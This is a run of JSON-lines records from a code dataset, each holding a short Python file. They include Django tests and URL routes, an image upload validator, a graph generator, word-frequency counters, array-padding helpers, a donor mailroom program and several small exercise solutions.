'v2'), ('k3', 'v3')])\n self.hash.save()\n self.assertEqual(len(self.hash), 3)\n self.hash.update_items([('k3', 'v3x'), ('k4', 'v4')])\n self.hash.save()\n self.assertEqual(len(self.hash), 4)\n self.assertEqual(self.hash['k1'], 'v1')\n self.assertEqual(self.hash['k2'], 'v2')\n self.assertEqual(self.hash['k3'], 'v3x')\n self.assertEqual(self.hash['k4'], 'v4')\n\n def test_set_items(self):\n self.hash.set_items([('k1', 'v1'), ('k2', 'v2'), ('k3', 'v3')])\n self.hash.save()\n self.assertEqual(len(self.hash), 3)\n self.assertEqual(self.hash['k1'], 'v1')\n self.assertEqual(self.hash['k2'], 'v2')\n self.assertEqual(self.hash['k3'], 'v3')\n self.hash.set_items([('k1', 'v1'), ('k3', 'v3x'), ('k4', 'v4')])\n self.hash.save()\n self.assertEqual(len(self.hash), 3)\n self.assertEqual(self.hash['k1'], 'v1')\n self.assertEqual(self.hash['k3'], 'v3x')\n self.assertEqual(self.hash['k4'], 'v4')\n\n def test_delete_items(self):\n self.hash.set_items([('k1', 'v1'), ('k2', 'v2'), ('k3', 'v3')])\n self.hash.save()\n self.assertEqual(len(self.hash), 3)\n self.hash.delete_items(['k2', 'k3'])\n self.assertEqual(len(self.hash), 1)\n\n\nclass DjangoMultiHashDriverTest(MultiHashDriverTestMixin, unittest.TestCase):\n with_blocking = False\n\n def setUp(self):\n self.db = DjangoMultiHashDriver('testdb')\n\n def tearDown(self):\n for h in DBHash.objects.filter(dbname=self.db.dbname):\n h.items.all().delete()\n h.delete()\n\n del self.db","sub_path":"pycfiles/LinkExchange.Django-0.1-py2.7/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"373092714","text":"import sys\nimport random\nimport string\n\n\ndef write():\n print('Creating new text file')\n\n name = str(sys.argv[1]) + '_graph_' + str(sys.argv[2]) +'.txt' # Name of text file coerced with +.txt\n try:\n file = open(name,'w') # Trying to create a new file or open one\n numNodes = int(sys.argv[1])\n numEdges = int(sys.argv[2])\n \n lineOne = ''\n for i in range(1, numNodes+1):\n lineOne += str(i) + ' ' \n lineOne += '\\n'\n file.write(lineOne)\n \n #make connections\n possible = []\n for i in range(1, numNodes+1):\n for j in range(1, numNodes+1):\n if j != i:\n possible.append([i,j])\n\n edges = random.sample(possible, numEdges)\n outString = '('\n for edge in edges:\n outString += str(edge) + ', '\n finalString = outString\n \n finalString = finalString[:-2]\n finalString += ')'\n file.write(finalString)\n \n file.close()\n\n except:\n print('Something went wrong! Can\\'t tell what?')\n sys.exit(0) # quit Python\n\nwrite()\n\t\n\n\t\n","sub_path":"finalgraph_creator.py","file_name":"finalgraph_creator.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"426402260","text":"from fastapi import UploadFile\n\nfrom appstore.exceptions.appstore_exceptions import InvalidFileException, UnsupportedMediaTypeException, InvalidFileNameException\n\n\ndef validate_image(file: UploadFile) -> bool:\n if file is None:\n raise InvalidFileException\n\n if file.content_type.lower() != \"image/jpeg\" and file.content_type.lower() != \"image/png\":\n raise UnsupportedMediaTypeException\n\n if file.filename is None or not (file.filename.lower().endswith(\".jpg\") or file.filename.lower().endswith(\".png\")):\n raise InvalidFileNameException\n\n return True\n","sub_path":"appstore/utils/validator/file_validator.py","file_name":"file_validator.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"639073352","text":"height = 0\n# loop to ensure input between 1 nd 8\nwhile (height < 1) or (height > 8):\n try:\n height = int(input(\"Height: \"))\n except ValueError:\n print(\"Input must be a whole number between 1 and 8\")\n # construct the pyramid, row by row\nfor i in range(1, height + 1):\n print((\" \" * (height - i)) + (\"#\" * i) + \" \" + (\"#\" * i))\n\n","sub_path":"pset6/mario/more/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"90703296","text":"\n\nimport re \nimport collections #引入正则表达式\ncount = int()\ndef stats_text_en(en,count): #定义一个函数\n #\\u4e00-\\u9fa5 \t汉字的unicode范围\n #\\u0030-\\u0039 \t数字的unicode范围\n #\\u0041-\\u005a \t大写字母unicode范围\n #\\u0061-\\u007a \t小写字母unicode范围\n #sub(pattern,repl,string) \t把字符串中的所有匹配表达式pattern中的地方替换成repl\n \n if isinstance(en,str):\n t1= re.sub(u\"([^\\u0041-\\u005a\\u0061-\\u007a])\",\" \",en) #将en中非英文字符转换成“ ”\n text1 = t1.split() #将字符串分割\n d = collections.Counter(text1).most_common(count) #counter 函数自带统计排列功能\n return d\n else:\n raise ValueError(\"请输入字符串\")\n\n\nimport jieba\ndef stats_text_cn(cn,count): #定义一个统计中文汉字字频的函数\n if isinstance(cn,str):\n t = re.sub(u\"([^\\u4e00-\\u9fa5])\",\"\",cn) #将cn中非中文字符转换成“”\n t1 = jieba.cut(t)\n d = collections.Counter(t1).most_common(count)\n return d\n else:\n raise ValueError(\"请输入字符串\")\n\n\ndef stats_text(j,count): #定义合并输出函数\n a = stats_text_cn(j,count) + stats_text_en(j,count) #将两次统计结果合并\n return a\n","sub_path":"exercises/1901010059/day09/mymodule/stats_word.py","file_name":"stats_word.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"3434315","text":"#!/bin/python\r\n# -*- coding: utf8 -*-\r\nimport sys\r\nimport os\r\nimport re\r\n\r\n# 请完成下面这个函数,实现题目要求的功能\r\n# 当然,你也可以不按照下面这个模板来作答,完全按照自己的想法来 ^-^\r\n# ******************************开始写代码******************************\r\n\r\n\r\ndef solution(arr):\r\n if len(arr) == 0:\r\n return 0\r\n ret = 0\r\n for i in range(len(arr) - 1):\r\n ret = ret + helper1(arr, i)\r\n return ret\r\n\r\n\r\ndef helper1(arr, i):\r\n ind = i\r\n mi = arr[i]\r\n for j in range(i + 1, len(arr)):\r\n if arr[j] < mi:\r\n mi = arr[j]\r\n ind = j\r\n if ind == i:\r\n return 0\r\n else:\r\n tmp = arr[ind]\r\n for k in range(ind, i):\r\n arr[k + 1] = arr[k]\r\n arr[i] = tmp\r\n return 1\r\n\r\n # ******************************结束写代码******************************\r\n\r\n\r\n# _arr_cnt = 0\r\n# _arr_cnt = int(input())\r\n# _arr_i = 0\r\n# _arr = []\r\n# while _arr_i < _arr_cnt:\r\n# _arr_item = int(input())\r\n# _arr.append(_arr_item)\r\n# _arr_i += 1\r\n_arr = [1, 9, 7, 5, 3]\r\n\r\nres = solution(_arr)\r\n\r\nprint(str(res) + \"\\n\")\r\n","sub_path":"src/writtenexam/xiaomi/delete_num.py","file_name":"delete_num.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"382132169","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom .person_autocomplete import PersonAutocomplete\n\napp_name = 'order'\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^login', views.login_view, name='login'),\n url(r'^logout', views.logout_view, name='logout'),\n url(r'^$', views.person_list, name='home'),\n url(r'^person/(?P[0-9]+)/$', views.person_detail),\n url(r'^person/(?P[0-9]+)/up$', views.vote_view, {'vote': 'up'}),\n url(r'^person/(?P[0-9]+)/down$', views.vote_view, {'vote': 'down'}),\n url(r'^person/(?P[0-9]+)/edit', views.edit_person),\n url(r'^vote/(?P[0-9]+)/edit', views.edit_vote),\n url(r'^vote/(?P[0-9]+)/delete', views.edit_vote, {'remove': True}),\n url(r'^add_person$', views.edit_person),\n url(r'^profile/$', views.profile),\n url(\n r'^person-autocomplete/$',\n PersonAutocomplete.as_view(create_field='name'),\n name='person-autocomplete',\n ),\n url(r'reset/$', views.password_change),\n url(r'invite/$', views.invitations_view),\n url(r'registration/$', views.registration_view),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"app/rating/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"334609728","text":"import turtle, colorsys,random\nt=turtle.Turtle()\nturtle.setup(800,800)\n\nn=0\ndistance=200\ndef tree(i):\n if i<=n:\n if i>n*0.6:\n t.color(\"green\")\n else:\n t.color(\"brown\")\n if n>8 and i==n and random.randint(1,2)==1:\n t.color(\"hot pink\")\n \n t.pensize(20/i)\n dis=random.uniform(distance/i*0.5,distance/i)\n t.fd(dis)\n t.left(30)\n i+=1\n tree(i)\n t.right(60)\n tree(i)\n t.left(30)\n i-=1\n t.penup()\n t.bk(dis)\n t.pendown()\nt.penup()\nt.goto(0,-300)\nt.pendown()\nt.left(90)\nprint(\"Enter Int Value\")\nn=int(input())\ntree(1)\n","sub_path":"Practice/gs15113_CYK_Practice_02_02_adv.py","file_name":"gs15113_CYK_Practice_02_02_adv.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"561740264","text":"from datatool.dataset_abstract import Dataset\nimport os\nimport wget\nimport pandas as pd\nfrom intervaltree.intervaltree import IntervalTree\nimport json\nfrom general.utils import Data\n\n\nclass VanKasteren(Dataset):\n def __init__(self,data_path,data_dscr):\n super().__init__(data_path,data_dscr);\n \n def _load(self):\n rootfolder = self.data_path\n sensefile = rootfolder + \"sensedata.txt\"\n actfile = rootfolder + \"actdata.txt\"\n\n all = pd.read_csv(sensefile, '\\t', None, header=0, names=[\n \"StartTime\", \"EndTime\", \"SID\", \"value\"])\n\n all.StartTime = pd.to_datetime(all.StartTime, format='%d-%b-%Y %H:%M:%S')\n all.EndTime = pd.to_datetime(all.EndTime, format='%d-%b-%Y %H:%M:%S')\n acts = {\n 0: 'None',\n 1: 'leave house',\n 4: 'use toilet',\n 5: 'take shower',\n 10: 'go to bed',\n 13: 'prepare Breakfast',\n 15: 'prepare Dinner',\n 17: 'get drink'}\n\n sens = {\n 1:\t'Microwave',\n 5:\t'Hall-Toilet door',\n 6:\t'Hall-Bathroom door',\n 7:\t'Cups cupboard',\n 8:\t'Fridge',\n 9:\t'Plates cupboard',\n 12:\t'Frontdoor',\n 13:\t'Dishwasher',\n 14:\t'ToiletFlush',\n 17:\t'Freezer',\n 18:\t'Pans Cupboard',\n 20:\t'Washingmachine',\n 23:\t'Groceries Cupboard',\n 24:\t'Hall-Bedroom door'}\n\n sensor_events = pd.DataFrame(columns=[\"SID\", \"time\", \"value\"])\n for i, s in all.iterrows():\n sensor_events = sensor_events.append({'SID': sens[s.SID], 'time': s.StartTime, 'value': s.value}, ignore_index=True)\n sensor_events = sensor_events.append({'SID': sens[s.SID], 'time': s.EndTime, 'value': 0}, ignore_index=True)\n\n activity_events = pd.read_csv(actfile, '\\t', None, header=0, names=[\"StartTime\", \"EndTime\", \"Activity\"])\n activity_events.StartTime = pd.to_datetime(\n activity_events.StartTime, format='%d-%b-%Y %H:%M:%S')\n activity_events.EndTime = pd.to_datetime(activity_events.EndTime, format='%d-%b-%Y %H:%M:%S')\n activity_events.Activity = activity_events.Activity.apply(lambda x: acts[x])\n sensor_events = sensor_events.sort_values(['time'])\n activity_events = activity_events.sort_values(['StartTime', 'EndTime'])\n # print('finish downloading files')\n \n\n activities = [acts[k] for k in acts]\n\n sensor_desc = pd.DataFrame(columns=['ItemId', 'ItemName', 'Cumulative',\n 'Nominal', 'OnChange', 'ItemRange', 'Location', 'Object', 'SensorName'])\n tmp_sensors = sensor_events['SID'].unique()\n for k in sens:\n item = {'ItemId': sens[k], 'ItemName': sens[k], 'Cumulative': 0, 'Nominal': 1, 'OnChange': 1, 'ItemRange': {\n 'range': ['0', '1']}, 'Location': 'None', 'Object': 'None', 'SensorName': 'None'}\n sensor_desc = sensor_desc.append(item, ignore_index=True)\n\n return activity_events, activities, sensor_events, sensor_desc\n # loadVanKasterenDataset()\n","sub_path":"datatool/vankasteren_handeler.py","file_name":"vankasteren_handeler.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"321506601","text":"# coding:utf-8\nimport unittest\nfrom time import *\nfrom selenium import webdriver\nfrom public import login, quit, creditCheckingDev, visaInterviewDev\n\n# 设置预期结果\nexpResult = \"test123\"\n\n\nclass MyTestCase(unittest.TestCase):\n # 环境预置\n def setUp(self):\n # self.browser = webdriver.Chrome() # 打开谷歌浏览器\n self.browser = webdriver.Firefox() # 打开火狐浏览器\n self.browser.implicitly_wait(15) # 隐性等待,最长等15秒\n self.url = \"http://10.1.2.151:6502\" # 打开开发环境的业务管理系统\n\n # 环境恢复\n # def tearDown(self):\n # quit.quit(self.browser) # 关闭浏览器\n\n # 测试用例\n def test_creditChecking_visaInterview_dev(self):\n # 操作步骤\n br = self.browser # 简化书写\n br.get(self.url) # 打开浏览器和系统\n print(br.title) # 把系统的title打印出来\n login.business_login_dev(br) # 登录开发环境的业务管理系统\n sleep(3)\n\n ##########################################################\n\n creditCheckingDev.test_creditChecking_dev(br) # 进行“征信通过”的操作\n\n ##############################################################\n\n visaInterviewDev.test_visaInterview_dev(br) # 进行“网点面签”的操作\n\n # 断言\n realResult = \"test123\"\n self.assertEqual(expResult, realResult)\n self.assertIn(expResult, realResult)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"testCases/creditChecking_visaInterview_dev.py","file_name":"creditChecking_visaInterview_dev.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"395151126","text":"\nimport numpy as np\n\ndef pad(data, padwidth, value):\n data = np.asarray(data)\n shape = data.shape\n if isinstance(padwidth, int):\n padwidth = (padwidth,)*len(shape) \n \n padded_shape = map(lambda ix: ix[1]+padwidth[ix[0]]*2, enumerate(shape))\n new_data = np.zeros(padded_shape, dtype=data.dtype)\n new_data.fill(value)\n new_data[ [slice(w, -w) if w > 0 else slice(None) for w in padwidth] ] = data \n return new_data\n\ndef multipad(data, padwidth, values):\n data = np.asarray(data)\n shape = data.shape\n if isinstance(padwidth, int):\n padwidth = (padwidth,)*len(shape) \n \n padded_shape = map(lambda ix: ix[1]+padwidth[ix[0]]*2, enumerate(shape))\n new_data = np.zeros(padded_shape, dtype=data.dtype)\n new_data[...,:] = values\n new_data[ [slice(w, -w) if w > 0 else slice(None) for w in padwidth] ] = data \n return new_data\n\ndef zeropad(data, padwidth):\n return pad(data, padwidth, 0.0) \n\ndef zeropad_to_shape(data, shape):\n \"\"\"Zero-pads an array to a certain shape\"\"\"\n new_data = np.zeros(shape)\n new_data[ [slice(shape[i]//2 - data.shape[i]//2, shape[i]//2 - data.shape[i]//2 + data.shape[i]) for i in xrange(len(shape))] ] = data\n return new_data\n\ndef border_value_pad(data, padwidth):\n data = np.asarray(data)\n shape = data.shape\n if isinstance(padwidth, int):\n padwidth = (padwidth,)*len(shape) \n \n padded_shape = map(lambda ix: ix[1]+padwidth[ix[0]]*2, enumerate(shape))\n new_data = np.empty(padded_shape, dtype=data.dtype)\n new_data[ [slice(w, -w) if w > 0 else slice(None) for w in padwidth] ] = data\n \n for i, pw in enumerate(padwidth):\n if pw > 0:\n selection = [slice(None)] * data.ndim\n selection2 = [slice(None)] * data.ndim\n \n # Lower boundary\n selection[i] = slice(0, pw)\n selection2[i] = slice(pw, pw+1)\n new_data[tuple(selection)] = new_data[tuple(selection2)]\n \n # Upper boundary\n selection[i] = slice(-pw, None)\n selection2[i] = slice(-pw-1, -pw)\n new_data[tuple(selection)] = new_data[tuple(selection2)]\n \n \n return new_data\n \n","sub_path":"amitgroup/util/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"85787951","text":"import pytest\nfrom threading import Thread\n\nfrom tests.conftest import MOCKED_URL\n\nN_THREADS = 10\nN_ITERATIONS = 20\n\n\n@pytest.mark.parametrize('iteration', range(N_ITERATIONS))\n@pytest.mark.parametrize('backend', ['sqlite', 'mongodb', 'gridfs', 'redis', 'dynamodb'])\ndef test_caching_with_threads(backend, iteration, mock_session):\n \"\"\"Stress test for multi-threaded caching\"\"\"\n\n def send_requests(url, params):\n for i in range(10):\n mock_session.get(url, params=params)\n\n threads = [Thread(target=send_requests, args=(MOCKED_URL, {'param': i})) for i in range(N_THREADS)]\n for t in threads:\n t.start()\n for t in threads:\n t.join()\n\n for i in range(N_THREADS):\n assert mock_session.cache.has_url(f'{MOCKED_URL}?param={i}')\n","sub_path":"tests/unit/test_thread_safety.py","file_name":"test_thread_safety.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"604107629","text":"if __name__ == '__main__':\n import sys\n sys.path.insert(0, 'C:\\\\Users\\\\James Jiang\\\\Documents\\\\Project Euler')\n\nfrom functions import *\n\nfrom progress import Progress\nanswers_list = ['dummy']\nwith open('C:\\\\Users\\\\James Jiang\\\\Documents\\\\Project Euler\\\\answers.txt') as answers:\n for line in answers:\n answers_list.append(int(line))\nprogress_ = Progress(\"Problem 066: Diophantine equation\", 0, 1000)\n\nmax_x = 0\nmax_D = 0\n\nfor D in range(2, 1001):\n progress_.count = D\n progress_.progress()\n if not is_square(D):\n d = minimal_solution(D)\n if d > max_x:\n max_x = d\n max_D = D\n\nprogress_.count = max_D\nprogress_.total = answers_list[66]\nprogress_.progress()\n\nif __name__ == '__main__':\n input()\n","sub_path":"python/problem_66.py","file_name":"problem_66.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"552287887","text":"arr = input().split()\nc = [[]]\nsum = 0\nfor i in range(len(arr)):\n n = i+1\n while (n<=len(arr)):\n d = arr[i:n]\n c.append(d)\n n += 1\nfor i in c:\n if(len(i)%2==1):\n for j in i:\n sum = sum+int(j)\nprint(sum)\n","sub_path":"answers/Utkarsh Srivastava/Day 6/Question 2.py","file_name":"Question 2.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"65889109","text":"import albumentations as A\nfrom albumentations.pytorch import ToTensorV2\n\ntrain_transform = A.Compose(\n [\n A.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n # A.CropAndPad(4),\n A.RandomCrop(32, 32),\n A.HorizontalFlip(),\n A.Cutout(num_holes=1, max_h_size=8, max_w_size=8, always_apply=False),\n ToTensorV2()\n ]\n)\n\ntest_transform = A.Compose([A.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),ToTensorV2()])","sub_path":"EVA S11/album_transform.py","file_name":"album_transform.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"243961904","text":"import numpy\r\n\r\n#\"\"\"\r\nm = int(input('\\nValor de m:'))\r\nn = int(input('Valor de n:'))\r\n\r\nmatrix = numpy.zeros((m,n))\r\nvector = numpy.zeros((n))\r\nx = numpy.zeros((m))\r\n\r\nprint ('Introduce la matriz de coeficientes y el vector solución')\r\n\r\nfor r in range(0, m):\r\n for c in range(0, n):\r\n matrix[(r),(c)]=(input(\"Elemento a[\"+str(r+1)+\",\"+str(c+1)+\"] \"))\r\n\r\n#Codigo funcionando para matrices 3x3 - ingresada por el usuario\r\nprint ('\\nmatriz ingresada: \\n')\r\nprint(matrix)\r\nprint ('\\nDeterminante de la matriz: ', numpy.linalg.det(matrix))\r\n\r\n#\"\"\"\r\n\r\n\"\"\"\r\n#Codigo alternativo para matrices de orden nxn\r\nmatrixnn = [[0, 2, 3], [7, -1, 20], [1, -14, 8]] \r\nprint ('\\nmatriz ingresada: \\n')\r\nprint(matrixnn)\r\nprint ('\\nDeterminante de la matriz: ', numpy.linalg.det(matrixnn))\r\n\"\"\"","sub_path":"pocketRocket/methods/determinante.py","file_name":"determinante.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"382085795","text":"# https: // leetcode.com/problems/best-time-to-buy-and-sell-stock/\n\ndef maxProfit(prices):\n if len(prices) == 0:\n return None\n \n profit = 0\n minBuy = prices[0]\n\n for idx in range(1, len(prices)):\n current = prices[idx] - minBuy\n\n profit = max(current, profit)\n minBuy = min(minBuy, prices[idx])\n\n return profit\n\ninput = [7, 1, 5, 3, 6, 4]\n\nprint(maxProfit(input))\n# Output: 5\n","sub_path":"array/buy_sell_stock.py","file_name":"buy_sell_stock.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"420213850","text":"#!/usr/bin/env python3\n\nimport pathlib\npth = pathlib.Path('./')\n\n\nclass Donor:\n\n def __init__(self, name):\n self._name = name\n self._donations = []\n self._rollup = {}\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, val):\n if not val:\n raise ValueError(\"A Donor must have a name.\")\n self._name = val\n\n @property\n def donations(self):\n return self._donations\n\n @donations.setter\n def donations(self, updated):\n self._donations = updated\n\n def add_donation(self, val):\n if val < 1:\n raise ValueError(\"A positive donation value is required.\")\n self.donations.append(val)\n\n @property\n def rollup(self):\n return self._rollup\n\n @rollup.setter\n def rollup(self, val):\n if not val:\n raise ValueError(\"Rollup values are required.\")\n self._rollup = val\n\n\nclass DonorList:\n\n def __init__(self, donors=None):\n self._donors = donors if donors else {}\n\n @property\n def donors(self):\n return self._donors\n\n def add_donor(self, name):\n donor = Donor(name)\n self.donors[donor.name] = donor\n\n def get_donor(self, name):\n if not name:\n raise ValueError(\"Please provide a donor name.\")\n\n if name in self.donors:\n return self.donors[name]\n else:\n return \"Donor not found.\"\n\n def get_donations(self, name):\n if not name:\n raise ValueError(\"Please provide a donor name.\")\n\n if name in self.donors:\n return self.donors[name].donations\n else:\n return \"Donor not found.\"\n\n def compose_thank_you(self, donor):\n if not donor:\n raise ValueError(\"Please provide a donor.\")\n\n message_obj = {\n 'donor_name': donor.name,\n 'donations': sum(donor.donations)\n }\n message = 'Dear {donor_name}, thanks so much '\\\n 'for your generous donations in the amount of: '\\\n '${donations}.'.format(**message_obj)\n return message\n\n def get_donor_names(self):\n print(\"\\n\".join([donor for donor in self.donors]))\n\n def generate_rollup(self):\n for donor in self.donors:\n cur_donor = self.donors[donor]\n number = len(cur_donor.donations)\n total = sum(cur_donor.donations)\n if cur_donor.donations:\n average = float(\n format(\n sum(\n cur_donor.donations) / len(\n cur_donor.donations\n ), '.2f'\n )\n )\n else:\n average = 0\n cur_donor.rollup = dict(zip(('number', 'total', 'average'),\n (number, total, average)))\n\n def generate_table(self):\n if not self.donors:\n print('The list of donors is empty.')\n return\n self.generate_rollup()\n headings = ('Donor Name', 'Num Gifts', 'Total Given', 'Average Gift')\n print('{:20}{:<15}{:<15}{:<15}'.format(*headings))\n print('{:_<65}'.format(''))\n for donor in self.donors:\n cur_donor = self.donors[donor]\n print('{:<20}'.format(cur_donor.name),\n ('{:<15}' * len(cur_donor.rollup))\n .format(*cur_donor.rollup.values()))\n\n def generate_letters(self):\n if not self.donors:\n print('The list of donors is empty.')\n return\n self.generate_rollup()\n for donor in self.donors:\n with open(donor.replace(' ', '_') + '.txt', 'w') as outfile:\n outfile.write(self.compose_thank_you(self.donors[donor]))\n print('Letters generated: ')\n for f in pth.iterdir():\n if '.txt' in str(f):\n print(f)\n\n def multiply_by(self, factor, min_donation=None, max_donation=None):\n for donor in self.donors:\n if min_donation and max_donation:\n filtered = filter(\n lambda x: x >= min_donation and x <= max_donation, self.donors[donor].donations\n )\n elif min_donation and not max_donation:\n filtered = filter(\n lambda x: x >= min_donation, self.donors[donor].donations\n )\n elif not min_donation and max_donation:\n filtered = filter(\n lambda x: x <= max_donation, self.donors[donor].donations\n )\n else:\n filtered = self.donors[donor].donations\n mapped = map(\n lambda x: x * factor, filtered\n )\n self.donors[donor].donations = list(mapped)\n\n newDL = DonorList(self.donors)\n newDL.generate_table()\n\n cli = DonorCli(newDL)\n cli.get_selection()\n\n\nclass DonorCli:\n\n def __init__(self, donorCollection):\n self._donorCollection = donorCollection\n\n @property\n def donorCollection(self):\n return self._donorCollection\n\n def set_donor(self):\n while True:\n try:\n name = input('Please enter a donor name: ')\n if not name:\n raise ValueError\n except ValueError:\n print('Oops, name is required.')\n return\n else:\n self.donorCollection.add_donor(name)\n self.set_donation(name)\n print('{} added. Current donors: '.format(name))\n self.donorCollection.get_donor_names()\n return\n\n def set_donation(self, donor):\n while True:\n try:\n donation = int(input('Please enter a donation amount: '))\n if not donation > 0:\n raise ValueError\n except ValueError:\n print('Please provide a whole number greater than zero.')\n else:\n self.donorCollection.donors[donor].add_donation(donation)\n print('${} donation received.'.format(donation))\n self.get_selection()\n\n def set_multiplier(self):\n while True:\n try:\n factor = int(input('Please enter a factor to multiply by: '))\n if not factor > 0:\n raise ValueError\n except ValueError:\n print('Please provide a whole number greater than zero.')\n else:\n self.set_min_max(factor)\n\n def set_min_max(self, factor):\n init_min_max = input('Would you like to filter donations '\n 'by min/max? y/n...\\n')[0].lower().strip()\n if not init_min_max == 'y':\n self.donorCollection.multiply_by(factor)\n\n min_donation = 0\n max_donation = 0\n\n while True:\n try:\n init_min = input('Filter by min? y/n...\\n')[0].lower().strip()\n if init_min == 'y':\n min_donation = int(input('Please enter a minimum donation: '))\n if not min_donation > 0:\n raise ValueError\n init_max = input('Filter by max? y/n...\\n')[0].lower().strip()\n if init_max == 'y':\n max_donation = int(input('Please enter a maximum donation: '))\n if not max_donation > min_donation:\n raise ValueError\n except ValueError:\n print('Please provide a min and max donation to filter by: ')\n else:\n if min_donation and max_donation:\n self.donorCollection.multiply_by(\n factor, min_donation, max_donation\n )\n elif min_donation and not max_donation:\n self.donorCollection.multiply_by(\n factor, min_donation\n )\n elif not min_donation and max_donation:\n self.donorCollection.multiply_by(\n factor, None, max_donation\n )\n\n def accept_donation(self):\n if not self.donorCollection.donors:\n print('The list of donors is empty.')\n return\n instruction = 'Please enter a full name or'\\\n ' type \\'list\\' to see donors:\\n'\n name_input = input(instruction)\n if name_input == 'list':\n self.donorCollection.get_donor_names()\n self.accept_donation()\n elif name_input in self.donorCollection.donors:\n self.set_donation(name_input)\n else:\n print('Donor not found.')\n\n def apply_selection(self, selection):\n arg_dict = {\n '1': self.set_donor,\n '2': self.accept_donation,\n '3': self.set_multiplier,\n '4': self.donorCollection.generate_table,\n '5': self.donorCollection.generate_letters,\n '6': quit\n }\n try:\n if not arg_dict.get(selection):\n raise KeyError\n arg_dict.get(selection)()\n except KeyError:\n print('Oops, invalid selection.')\n\n def get_selection(self):\n options = 'Please select from the menu:\\n'\\\n '1) add new donor\\n'\\\n '2) log donation\\n'\\\n '3) multiply donations\\n'\\\n '4) create a report\\n'\\\n '5) send letters to everyone\\n'\\\n '6) quit\\n'\n while True:\n selection = input(options)\n self.apply_selection(selection)\n if selection == '2':\n self.get_selection()\n\n\ndef main():\n dl = DonorList()\n cli = DonorCli(dl)\n cli.get_selection()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"students/stuartkershaw/lesson10/mailroom_fp.py","file_name":"mailroom_fp.py","file_ext":"py","file_size_in_byte":9931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"121147488","text":"def minValue(self, gameState, agentIndex, depth, alpha, beta):\n v = {'value':float('inf'), 'action': Directions.STOP}\n legalMoves = gameState.getLegalActions(agentIndex)\n\n for action in legalMoves:\n\n if action == Directions.STOP: continue\n\n successorGameState = gameState.generateSuccessor(agentIndex, action)\n successorMinMax = self.minimax(successorGameState, agentIndex + 1, depth, action, alpha, beta)\n\n if v['value'] >= successorMinMax['value']:\n v['value'] = successorMinMax['value']\n v['action'] = action\n\n if v['value'] <= alpha: return v\n\n beta = min(beta, v['value'])\n\n return v","sub_path":"ia/t2/example/T2-AlphaBetaAgent-minValue.py","file_name":"T2-AlphaBetaAgent-minValue.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"246063934","text":"\"\"\"nile common module.\"\"\"\nimport os\n\nCONTRACTS_DIRECTORY = \"contracts/\"\nBUILD_DIRECTORY = \"artifacts/\"\nTEMP_DIRECTORY = \".temp/\"\nABIS_DIRECTORY = f\"{BUILD_DIRECTORY}abis/\"\n\n\ndef get_all_contracts(ext=None):\n \"\"\"Get all cairo contracts in the default contract directory.\"\"\"\n if ext is None:\n ext = \".cairo\"\n\n files = list()\n for (dirpath, _, filenames) in os.walk(CONTRACTS_DIRECTORY):\n files += [os.path.join(dirpath, file) for file in filenames]\n\n return filter(lambda file: file.endswith(ext), files)\n","sub_path":"src/nile/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"114128586","text":"\n\n# counts num of bits that are set to 1 in a positive int\ndef count_bits(x):\n num_bits = 0\n while x:\n num_bits += x & 1\n x >>= 1\n return num_bits\n\nprint(count_bits(12))\n","sub_path":"Primitive 